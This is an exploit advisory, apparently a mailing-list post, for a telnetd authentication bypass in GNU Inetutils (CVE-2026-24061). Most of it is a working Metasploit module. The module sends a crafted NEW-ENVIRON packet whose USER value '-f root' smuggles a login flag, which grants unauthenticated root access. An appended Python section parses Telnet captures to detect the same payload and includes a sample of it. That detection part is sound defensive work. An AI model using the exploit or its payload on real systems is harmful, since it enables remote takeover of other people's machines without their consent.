=============================================================================================================================================
| # Title     : GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass Root Access                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.gnu.org/software/inetutils/                                                                                     |
=============================================================================================================================================

[+] Summary :

A critical authentication bypass vulnerability has been identified in GNU Inetutils specifically affecting the telnetd service.
The issue occurs due to improper validation of the NEW-ENVIRON Telnet subnegotiation option.

By sending a specially crafted environment variable containing the value -f root within the USER field, a remote attacker can force
the service to invoke the system login process in a way that bypasses password authentication.

Successful exploitation allows an unauthenticated remote attacker to gain root-level access over Telnet without providing valid credentials.

The vulnerability is tracked as: CVE-2026-24061

Impact

    - Remote unauthenticated root access
    - No brute force required
    - No valid credentials required
    - Full system compromise possible

Severity

    Critical – Pre-Authentication Remote Code Execution / Privilege Escalation

[+] POC :

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Telnet

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'GNU Inetutils telnetd Authentication Bypass (Enhanced)',
          'Description'    => %q{
            This module exploits an authentication bypass vulnerability in GNU Inetutils telnetd.
            By sending a specially crafted NEW-ENVIRON subnegotiation with a USER variable
            containing '-f root', an attacker can login as root without a password.
            This occurs because telnetd passes the environment variable directly to the
            login command without proper sanitization.
          },
          'Author'         => [ 'indoushka' ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2026-24061' ]
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'Space'    => 2000,
              'BadChars' => "",
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [ [ 'Automatic', { } ] ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Feb 20 2026',
          'Notes'          =>
            {
              'Stability'   => [ CRASH_SAFE ],
              'Reliability' => [ REPEATABLE_SESSION ],
              'SideEffects' => [ IOC_IN_LOGS ]
            }
        ))

        register_options(
          [
            Opt::RPORT(23),
            OptString.new('USER', [ true, "The target user to bypass (usually root)", 'root' ])
          ])
      end

      def exploit
        connect

        print_status("Waiting for server banner and negotiation...")
        banner = sock.get_once(-1, 5)
        if banner
          print_status("Target Banner: #{banner.strip}")
        end

        packet = "\xff\xfa\x27\x00"
        packet << "\x00USER"
        packet << "\x01-f #{datastore['USER']}"
        packet << "\xff\xf0"

        print_status("Sending bypass payload for user: #{datastore['USER']}...")
        sock.put(packet)

        Rex.sleep(1)
        sock.put("id\n")
        res = sock.get_once(-1, 5)

        if res && res =~ /uid=0/
          print_good("Success! Authenticated as root (uid=0).")
          handler
        else
          print_error("Failed to bypass authentication. Server might be patched or using PAM sanitization.")
        end
      rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
        print_error("Connection failed.")
      end
    end

Greetings to :
==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)
==============================================================================
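
Detection-side view of the NEW-ENVIRON subnegotiation described in the summary, as an added example that is not part of the original advisory or of the module above: a Python parser for captured client-to-server Telnet bytes that decodes NEW-ENVIRON payloads per RFC 1572 and reports USER values that begin with "-" or contain whitespace. The function names, the SAMPLE bytes and the whitespace heuristic are assumptions made for this illustration.

```python
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEW_ENVIRON = 39                        # option 0x27, RFC 1572
IS, INFO = 0, 2                         # commands that carry client values
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3
SAMPLE = b"\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0"  # constructed capture

def subnegotiations(stream):
    """Yield (option, payload) per IAC SB ... IAC SE, undoing IAC IAC escapes."""
    i, body = 0, None                   # body is None outside a subnegotiation
    while i < len(stream):
        b = stream[i]
        if b != IAC or i + 1 >= len(stream):
            if body is not None:
                body.append(b)
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd == IAC and body is not None:
            body.append(IAC)            # escaped literal 0xFF inside SB
        elif cmd == SB:
            body = bytearray()
        elif cmd == SE:
            if body:
                yield body[0], bytes(body[1:])
            body = None
        i += 3 if 251 <= cmd <= 254 else 2   # WILL/WONT/DO/DONT carry an option byte

def environ_vars(payload):
    """Decode a NEW-ENVIRON IS/INFO payload into {name: value}."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    fields, it = [], iter(payload[1:])
    for b in it:
        if b in (VAR, VALUE, USERVAR):
            fields.append((b, bytearray()))
        elif fields:                    # ESC quotes the next byte as data
            fields[-1][1].append(next(it, b) if b == ESC else b)
    out, name = {}, ""
    for kind, data in fields:
        if kind == VALUE:
            out[name] = data.decode("latin-1")
        else:
            name = data.decode("latin-1")
    return out

def suspicious_user(stream):
    """Heuristic (assumption): USER starting with '-' or containing whitespace."""
    return [v for opt, p in subnegotiations(stream) if opt == NEW_ENVIRON
            for k, v in environ_vars(p).items()
            if k == "USER" and (v.startswith("-") or any(c.isspace() for c in v))]
```

`suspicious_user(SAMPLE)` returns the flagged USER values for one direction of a session; feed it the reassembled client-to-server byte stream from a capture.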